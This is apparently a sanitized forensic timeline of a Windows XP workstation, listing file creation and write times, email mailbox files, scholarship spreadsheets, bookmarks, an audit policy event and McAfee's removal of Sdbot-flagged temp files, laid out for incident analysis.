legend
- “bad” ids
- ids logs
- “important” internet history
- internet history
- mcafee stops something bad
- windows prefetch cache
- files containing restricted data
- file timestamps
- “important” event log
- event log
- comments
| time | activity | name | path/details |
| --- | --- | --- | --- |
| 01/01/80 1:00:00 | created | hkcmd.exe | C:\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive |
| 01/01/80 1:00:00 | created | igfxtray.exe | C:\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive |
| 01/01/80 1:00:00 | created | smax4pnp.exe | C:\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive |
| 10/05/01 8:20:28 | written | Ken.mbx | C:\My Documents\Qualcomm\Eudora\Ken.mbx |
| 10/05/01 8:20:28 | written | Ken.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx |
| 10/29/01 7:02:04 | written | Misc.mbx | C:\My Documents\Qualcomm\Eudora\Misc.mbx |
| 10/29/01 7:02:04 | written | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx |
| 10/29/01 7:04:38 | written | Out.mbx | C:\My Documents\Qualcomm\Eudora\Out.mbx |
| 10/29/01 7:04:38 | written | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx |
| 05/07/02 12:00:56 | written | foo.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls |
| 05/07/02 12:00:56 | written | boff claybon.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls |
| 07/26/02 17:02:06 | written | UNWISE.EXE | C:\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive |
| 09/19/03 14:24:44 | created | agent.exe | C:\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive |
| 09/19/03 14:26:10 | created | issch.exe | C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive |
| 01/07/04 2:01:00 | created | sgtray.exe | C:\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive |
| 01/07/04 2:01:00 | written | sgtray.exe | C:\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive |
| 01/07/04 15:56:57 | created | Credit Union of Ohio - Your Financial Resource Partner.url | http://www.cuofohio.org/ Bookmarks - |
| 04/13/04 7:07:18 | written | issch.exe | C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive |
| 04/17/04 13:41:30 | written | ISUSPM.exe | C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive |
| 04/23/04 20:03:06 | written | agent.exe | C:\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 3:06:34 | created | msmsgs.exe | C:\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | DRWATSON.EXE | C:\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive |
| 08/04/04 7:00:00 | created | MPNOTIFY.EXE | C:\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | accwiz.exe | C:\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | cmd.exe | C:\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | conf.exe | C:\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | ctfmon.exe | C:\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | defrag.exe | C:\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | dfrgntfs.exe | C:\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | dumprep.exe | C:\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | dwwin.exe | C:\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive |
| 08/04/04 7:00:00 | created | explorer.exe | C:\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | fxscover.exe | C:\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive |
| 08/04/04 7:00:00 | created | fxssvc.exe | C:\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | helpsvc.exe | C:\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | imapi.exe | C:\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | ipconfig.exe | C:\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | mshta.exe | C:\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | msimn.exe | C:\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | mstsc.exe | C:\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | netsh.exe | C:\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | ntbackup.exe | C:\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | ntvdm.exe | C:\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | regedit.exe | C:\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | rundll32.exe | C:\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | taskkill.exe | C:\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | tasklist.exe | C:\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | taskmgr.exe | C:\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive |
| 08/04/04 7:00:00 | created | unregmp2.exe | C:\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | userinit.exe | C:\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | wab.exe | C:\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | wmplayer.exe | C:\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | created | wordpad.exe | C:\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive |
| 08/04/04 7:00:00 | written | DRWATSON.EXE | C:\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive |
| 08/04/04 7:00:00 | written | MPNOTIFY.EXE | C:\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive |
| 09/15/04 14:27:54 | written | unregmp2.exe | C:\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive |
| 09/15/04 14:28:00 | written | wmplayer.exe | C:\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive |
| 10/12/04 18:54:30 | written | DVDLauncher.exe | C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File |
| 10/14/04 17:42:54 | written | smax4pnp.exe | C:\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive |
| 11/04/04 14:03:44 | created | BRHS.ORG.url | http://w3.brhs.org/ Bookmarks - |
| 01/27/05 8:05:47 | created | pagefile.sys | Bookmarks - |
| 01/27/05 8:06:08 | created | A0061054.ini | C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.ini Initialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed |
| 01/27/05 8:10:43 | created | hiberfil.sys | Bookmarks - |
| 01/27/05 8:10:43 | created | hiberfil.sys | http://ubw.osu.edu/ubw_at_ohio.htm Bookmarks - |
| 01/27/05 8:10:43 | created | hiberfil.sys | http://ubw.osu.edu/underwater_basket_weaving_facilities_at_ohio.htm Bookmarks - |
| 01/27/05 8:10:43 | created | hiberfil.sys | http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windowsm!a Bookmarks - |
| 01/27/05 8:10:43 | created | hiberfil.sys | http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail Bookmarks - |
| 01/27/05 8:19:35 | created | DVDLauncher.exe | C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File |
| 02/07/05 10:37:19 | created | _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005 | C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005 File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed |
| 02/07/05 10:39:59 | written | _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005 | C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005 File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed |
| 02/07/05 10:40:41 | logged | SecEvent.Evt | EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: OSUUBWCLASS DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: OSUUBWCLASS$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)- |
| 02/10/05 14:32:53 | created | accicons.exe | C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive |
| 02/10/05 14:32:53 | created | pptico.exe | C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive |
| 02/10/05 14:32:53 | created | wordicon.exe | C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive |
| 02/10/05 14:32:53 | created | xlicons.exe | C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive |
| 09/24/05 1:30:38 | created | acrotray.exe | C:\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive |
| 09/24/05 1:31:14 | created | acrodist.exe | C:\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive |
| 10/19/05 8:59:12 | written | hkcmd.exe | C:\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive |
| 10/19/05 8:59:14 | written | igfxtray.exe | C:\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive |
| 01/09/06 7:00:40 | written | SSLang.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File |
| 01/12/06 19:52:32 | written | acrotray.exe | C:\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive |
| 01/12/06 19:53:07 | written | acrodist.exe | C:\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive |
| 02/14/06 4:32:15 | written | SSMMgr.exe | C:\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive |
| 02/23/06 7:47:12 | modified | DRWATSON.EXE | C:\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive |
| 03/16/06 19:38:01 | created | verclsid.exe | C:\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File |
| 03/23/06 2:14:37 | written | Ssopen.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File |
| 03/23/06 8:54:52 | written | setup.exe | C:\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File |
| 04/07/06 15:02:24 | written | Weather.exe | C:\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive |
| time | activity | name | path/details |
| --- | --- | --- | --- |
| 04/19/06 7:24:19 | created | VERCLSID.EXE-28F52AD2.pf | C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf |
| 04/27/06 15:07:38 | written | ubw042706ay07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls |
| 04/27/06 15:07:38 | written | ogr-ubw042706ay07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls |
| 06/19/06 7:27:17 | Deleted | WFV6C.tmp | C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFV6C.tmp W32/Sdbot.worm.gen.as (Virus) OUTLOOK.EXE |
| 06/19/06 7:27:25 | Deleted | WFV7D.tmp | C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFV7D.tmp W32/Sdbot.worm.gen.as (Virus) OUTLOOK.EXE |
| 06/19/06 7:28:18 | Deleted | WFVA0.tmp | C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFVA0.tmp W32/Sdbot.worm.gen.as (Virus) OUTLOOK.EXE |
| 10/04/06 9:04:20 | written | Eudora.exe | C:\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/26/06 14:40:34 | created | mdm.exe | C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive |
| 10/26/06 14:40:34 | written | mdm.exe | C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive |
| 11/07/06 15:39:18 | written | 37679041.pdf.zip | C:\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 11/07/06 15:39:18 | written | 37679041.pdf.zip | C:\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 11/07/06 15:39:18 | written | 37679041.pdf.zip | C:\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive |
| 01/09/07 12:56:21 | created | ISUSPM.exe | C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive |
| 01/17/07 7:17:00 | written | Mike.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx |
| 01/17/07 7:17:00 | written | Mike.mbx | C:\Eudora\Mike.mbx |
| 01/17/07 7:17:00 | written | Mike.mbx | C:\My Documents\Eudora\Mike.mbx |
| 04/05/07 13:21:36 | created | AccessProtectionLog.txt | C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txt Text Document File, Archive |
| 04/05/07 13:21:36 | created | BufferOverflowProtectionLog.txt | C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txt Text Document Match File, Archive |
| 06/05/07 11:03:30 | created | SSSInstaller.dll | C:\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 06/05/07 11:03:30 | created | SSSInstaller.dll | C:\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 06/05/07 11:03:30 | written | SSSInstaller.dll | C:\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 06/05/07 11:03:30 | written | SSSInstaller.dll | C:\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive |
| 06/12/07 5:46:30 | created | SbTrayManager.exe | C:\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive |
| 06/12/07 5:46:30 | written | SbTrayManager.exe | C:\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive |
| 06/22/07 10:55:27 | created | Joseph W. Testa, Franklin County Auditor - Welcome!.url | http://www.co.franklin.oh.us/auditor/ Bookmarks - |
| 07/23/07 15:37:20 | written | IFT 07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls |
| 07/23/07 15:37:20 | written | IFT 07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls |
| 08/13/07 19:32:30 | written | mshta.exe | C:\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive |
| 09/12/07 15:49:42 | written | Scholarship.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx |
| 09/12/07 15:49:42 | written | Scholarship.mbx | C:\Eudora\Scholarship.mbx |
| 09/12/07 15:49:42 | written | Scholarship.mbx | C:\My Documents\Eudora\Scholarship.mbx |
| 09/18/07 13:50:26 | written | Previous search.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx |
| 09/18/07 13:50:26 | written | Previous search.mbx | C:\Eudora\Previous search.mbx |
| 09/18/07 13:50:26 | written | Previous search.mbx | C:\My Documents\Eudora\Previous search.mbx |
| 09/18/07 13:50:26 | written | Previous search.mbx | C:\Program Files\Qualcomm\Eudora\Previous search.mbx |
| 09/28/07 8:20:36 | written | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx |
| 09/28/07 8:20:36 | written | Misc.mbx | C:\Eudora\Misc.mbx |
| 09/28/07 8:20:36 | written | Misc.mbx | C:\My Documents\Eudora\Misc.mbx |
| 10/01/07 8:39:24 | written | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx |
| 10/01/07 8:39:24 | written | Out.mbx | C:\Eudora\Out.mbx |
| 10/01/07 8:39:24 | written | Out.mbx | C:\My Documents\Eudora\Out.mbx |
| 10/01/07 9:48:40 | created | Eudora.exe | C:\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/01/07 10:52:52 | created | Out.mbx | C:\Program Files\Qualcomm\Eudora\Out.mbx |
| 10/01/07 11:06:24 | created | NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | created | Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | created | Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | created | Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/01/07 11:06:24 | created | Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | written | NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | written | Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | written | Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 11:06:24 | written | Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable File, Read Only, Archive |
| 10/01/07 11:06:24 | written | Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe | C:\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exe Windows Executable Code\Executable Match File, Read Only, Archive |
| 10/01/07 12:34:09 | created | Mike.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx |
| 10/01/07 12:34:09 | modified | Mike.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx |
| 10/01/07 12:34:09 | modified | Mike.mbx | C:\My Documents\Eudora\Mike.mbx |
| 10/01/07 12:34:10 | created | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx |
| 10/01/07 12:34:14 | created | Scholarship.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx |
| 10/01/07 12:34:14 | modified | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx |
| 10/01/07 12:34:14 | modified | Out.mbx | C:\My Documents\Eudora\Out.mbx |
| 10/01/07 12:34:15 | created | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx |
| 10/01/07 12:34:15 | modified | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx |
| 10/01/07 12:34:15 | modified | Misc.mbx | C:\My Documents\Eudora\Misc.mbx |
| 10/01/07 12:34:15 | modified | Scholarship.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx |
| 10/01/07 12:34:15 | modified | Scholarship.mbx | C:\My Documents\Eudora\Scholarship.mbx |
| 10/01/07 12:34:16 | created | Previous search.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx |
| 10/01/07 12:34:16 | modified | Previous search.mbx | C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx |
| 10/01/07 12:34:16 | modified | Previous search.mbx | C:\My Documents\Eudora\Previous search.mbx |
| 10/01/07 12:35:04 | created | 37679041.pdf.zip | C:\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive |
| 10/01/07 12:35:04 | modified | 37679041.pdf.zip | C:\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 10/01/07 12:35:04 | modified | 37679041.pdf.zip | C:\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive |
| 10/01/07 12:37:08 | accessed | foo.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls |
| 10/01/07 12:37:08 | created | foo.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls |
| 10/01/07 12:37:08 | modified | foo.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls |
| 10/01/07 12:37:08 | accessed | boff claybon.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls |
| 10/01/07 12:37:08 | created | boff claybon.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls |
| 10/01/07 12:37:08 | modified | boff claybon.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls |
| 10/01/07 12:37:12 | created | ubw042706ay07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls |
| 10/01/07 12:37:12 | created | IFT 07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls |
| 10/01/07 12:37:12 | created | IFT 07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls |
| 10/01/07 12:37:12 | created | ogr-ubw042706ay07.xls | C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls |
| 10/01/07 12:49:37 | created | Mike.mbx | C:\Eudora\Mike.mbx |
| 10/01/07 12:49:38 | modified | Mike.mbx | C:\Eudora\Mike.mbx |
| 10/01/07 12:49:39 | created | Out.mbx | C:\Eudora\Out.mbx |
| 10/01/07 12:49:43 | created | Misc.mbx | C:\Eudora\Misc.mbx |
| 10/01/07 12:49:43 | created | Scholarship.mbx | C:\Eudora\Scholarship.mbx |
| 10/01/07 12:49:43 | modified | Out.mbx | C:\Eudora\Out.mbx |
| 10/01/07 12:49:43 | modified | Scholarship.mbx | C:\Eudora\Scholarship.mbx |
| 10/01/07 12:49:44 | created | Previous search.mbx | C:\Eudora\Previous search.mbx |
| 10/01/07 12:49:44 | modified | Misc.mbx | C:\Eudora\Misc.mbx |
| 10/01/07 12:49:44 | modified | Previous search.mbx | C:\Eudora\Previous search.mbx |
| 10/01/07 12:49:44 | modified | Previous search.mbx | C:\Program Files\Qualcomm\Eudora\Previous search.mbx |
| 10/01/07 12:50:20 | created | 37679041.pdf.zip | C:\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 10/01/07 12:50:20 | modified | 37679041.pdf.zip | C:\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive |
| 10/01/07 13:13:10 | created | Mike.mbx | C:\Program Files\Qualcomm\Eudora\Mike.mbx |
| 10/01/07 13:13:10 | created | Misc.mbx | C:\Program Files\Qualcomm\Eudora\Misc.mbx |
| 10/01/07 13:13:29 | created | Previous search.mbx | C:\Program Files\Qualcomm\Eudora\Previous search.mbx |
| 10/01/07 13:13:30 | created | Scholarship.mbx | C:\Program Files\Qualcomm\Eudora\Scholarship.mbx |
| 10/01/07 13:23:53 | created | Ken.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx |
| 10/01/07 13:23:53 | modified | Ken.mbx | C:\My Documents\Qualcomm\Eudora\Ken.mbx |
| 10/01/07 13:23:53 | modified | Ken.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx |
| 10/01/07 13:23:54 | created | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx |
| 10/01/07 13:23:54 | created | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx |
| 10/01/07 13:23:54 | modified | Misc.mbx | C:\My Documents\Qualcomm\Eudora\Misc.mbx |
| 10/01/07 13:23:54 | modified | Misc.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx |
| 10/01/07 13:23:54 | modified | Out.mbx | C:\My Documents\Qualcomm\Eudora\Out.mbx |
| 10/01/07 13:23:54 | modified | Out.mbx | C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx |
| 10/01/07 13:35:19 | created | UNWISE.EXE | C:\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive |
| 10/01/07 13:35:20 | created | Weather.exe | C:\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive |
